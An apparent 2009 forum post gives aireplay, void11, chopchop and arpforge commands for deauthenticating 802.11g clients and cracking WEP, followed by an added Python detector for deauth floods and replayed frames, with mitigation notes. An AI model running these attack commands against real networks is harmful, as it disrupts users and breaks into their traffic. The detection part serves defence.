Well, I've been doing some testing with the new aireplay and I managed to inject with all drivers. A couple of things came up that were interesting: I managed to deauthenticate an 802.11g client with an 802.11b card and crack WEP on an all-802.11g network with an 802.11b card (captured the traffic with an 802.11g card first).
For the deauthentication I used a Cisco Aironet CB21AG-A-K9 (Atheros card) to connect to a Netgear WGR614 access point and set both to 802.11g-only mode. I used an SMC2532W-B 802.11b card (Prism 2.5 card) to deauthenticate the 802.11g stations. To ensure I was actually deauthenticating stations, I used wavemon to monitor my Cisco card, which was associated to the AP.
The following settings were used:
Cisco Card
- iwpriv ath0 mode 3 (G mode only)
SMC Card
1) iwpriv wlan0 hostapd 1
2) iwconfig wlan0 mode master channel <channel>
Commands issued:
Created deauthentication packet using airforge:
airforge <BSSID> <SRC MAC> deauth
Then injected using the 802.11b card:
aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth wlan0
Used void11 mass deauthentication with hostap drivers:
void11_penetration wlan0
Ignore the 'ioctl[PRISM2_IOCTL_HOSTAPD]: Invalid argument' error; void11 will still work.
My 802.11g station dropped like a brick.
I also managed to crack WEP on an all-802.11g network with my SMC2532W-B 802.11b card. I noticed something strange: when I sniff traffic with aireplay using my 802.11b card, I sometimes manage to capture traffic from the 802.11g network. I am not sure if this is due to the encoding or what, but I have captured and replayed 802.11g traffic with my 802.11b card alone. I usually capture with my Netgear WG511 (PrismGT card) and then crack the packet with chopchop using my 802.11b SMC card.
Cracking 802.11g network with 802.11b card
Used the same equipment as mentioned in the beginning, plus a Netgear WG511 802.11g card.
Captured packet using aireplay:
aireplay -i eth1 (Also, sometimes I could use the 802.11b SMC card to capture traffic. Why? Not sure yet.)
Used chopchop to crack using 802.11b card:
chopchop only works with Prism-based cards.
chopchop -i wlan0 <BSSID> <SRC MAC> -p <aireplay packet>
Utilized arpforge to create new packet:
arpforge <iv. file> 1 <bssid> <mac src> <ip src> <ip dst> fakearp
Inject new packet using 802.11b card:
aireplay -r fakearp wlan0
The IV count would rise.
Please test my results to verify that they are consistent with your equipment. As for 802.11b capturing 802.11g traffic, it is strange. I set my Cisco Atheros card to G-mode only with iwpriv ath0 mode 3 and my Netgear AP is set to G-mode only as well; please test this too. Post your results on the forum and use the date of this post as the title.
Source: http:/
Last updated 29 October 2009 by darklevel
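From the monitoring side, the two things the post produces on the air are easy to spot in a monitor-mode capture: a burst of deauthentication management frames carrying the AP's BSSID, and one encrypted data frame (the replayed ARP) transmitted over and over by a single source with the same IV and ciphertext, which a genuine station never does. The script below is an added example, not code from the post or from the aircrack tools; every address, frame and timestamp in it is constructed, and the parser only reads the 802.11 header fields the two checks need.

```python
"""Added example (not from the post): flag a deauthentication flood and a
replayed WEP data frame in a list of (timestamp, raw_frame) pairs such as a
monitor-mode sniffer would hand back.  All frames below are constructed."""
import struct
from collections import Counter, defaultdict

TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_DEAUTH = 0x0C
FLAG_RETRY, FLAG_PROTECTED = 0x08, 0x40   # bits of the frame-control flags byte


def parse_frame(raw: bytes) -> dict:
    """Parse the generic 24-byte 802.11 MAC header; the body is left opaque."""
    if len(raw) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    (fc,) = struct.unpack_from("<H", raw, 0)   # little-endian: flags in the high byte
    flags = fc >> 8
    return {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "retry": bool(flags & FLAG_RETRY),
        "protected": bool(flags & FLAG_PROTECTED),
        "addr1": raw[4:10], "addr2": raw[10:16], "addr3": raw[16:22],
        "seq": struct.unpack_from("<H", raw, 22)[0] >> 4,
        "body": raw[24:],
    }


def build_deauth(bssid: bytes, dst: bytes, reason: int = 7) -> bytes:
    """Management frame, subtype deauth: addr1=DA, addr2=SA (the AP), addr3=BSSID."""
    fc = (TYPE_MGMT << 2) | (SUBTYPE_DEAUTH << 4)
    header = struct.pack("<HH", fc, 0) + dst + bssid + bssid + struct.pack("<H", 0)
    return header + struct.pack("<H", reason)


def build_wep_data(bssid, src, dst, iv: bytes, ciphertext: bytes, seq: int, retry=False):
    """To-DS data frame with the Protected bit set; body = 3-byte IV, key id, ciphertext."""
    flags = FLAG_PROTECTED | 0x01 | (FLAG_RETRY if retry else 0)   # 0x01 = To-DS
    fc = (TYPE_DATA << 2) | (flags << 8)
    header = struct.pack("<HH", fc, 0) + bssid + src + dst + struct.pack("<H", seq << 4)
    return header + iv + b"\x00" + ciphertext


def detect_deauth_flood(frames, window_s=1.0, threshold=5):
    """Return {bssid: peak} for every BSSID whose deauth frames, in any sliding
    window of window_s seconds, number at least threshold."""
    times = defaultdict(list)
    for ts, raw in frames:
        f = parse_frame(raw)
        if f["type"] == TYPE_MGMT and f["subtype"] == SUBTYPE_DEAUTH:
            times[f["addr3"]].append(ts)
    alerts = {}
    for bssid, tl in times.items():
        tl.sort()
        start, peak = 0, 0
        for end, t in enumerate(tl):
            while t - tl[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts


def detect_replayed_frames(frames, threshold=3):
    """Return {(src, iv, ciphertext): count} for protected data frames that a
    source transmits byte-identically at least threshold times.  Frames with the
    Retry bit set are skipped so normal 802.11 retransmissions do not trigger it."""
    seen = Counter()
    for _, raw in frames:
        f = parse_frame(raw)
        if f["type"] == TYPE_DATA and f["protected"] and not f["retry"] and len(f["body"]) > 4:
            iv, ciphertext = f["body"][:3], f["body"][4:]
            seen[(f["addr2"], iv, ciphertext)] += 1
    return {key: n for key, n in seen.items() if n >= threshold}


def sample_capture():
    """Constructed capture: three normal frames, one retransmission, an 8-frame
    deauth burst and one frame replayed five times.  Addresses are made up."""
    bssid = bytes.fromhex("00095b000001")      # constructed AP address
    sta = bytes.fromhex("0040960000a1")        # constructed station address
    bcast = b"\xff" * 6
    frames = []
    for i in range(3):                          # ordinary traffic, distinct IVs
        frames.append((0.1 * i, build_wep_data(bssid, sta, bcast, bytes([i, 0, 0]), bytes([0x10 + i]) * 40, seq=i)))
    frames.append((0.35, build_wep_data(bssid, sta, bcast, b"\x00\x00\x00", b"\x10" * 40, seq=0, retry=True)))
    for i in range(8):                          # deauth burst within 0.4 s
        frames.append((1.0 + 0.05 * i, build_deauth(bssid, sta)))
    replayed = build_wep_data(bssid, sta, bcast, b"\x05\x06\x07", b"\xaa" * 40, seq=10)
    for i in range(5):                          # same IV and ciphertext, five times
        frames.append((2.0 + 0.01 * i, replayed))
    return frames, bssid, sta


if __name__ == "__main__":
    frames, bssid, sta = sample_capture()
    print("deauth floods:", {k.hex(): v for k, v in detect_deauth_flood(frames).items()})
    print("replayed frames:", {(k[0].hex(), k[1].hex()): v for k, v in detect_replayed_frames(frames).items()})
```

Both checks key on behaviour rather than on a tool signature, so they hold whichever injector produced the frames. On the mitigation side, 802.11w (protected management frames) removes the first signal entirely, because a station then discards deauthentication frames that are not integrity-protected, and moving off WEP removes the second, since the replay only pays off against WEP's per-frame IV scheme.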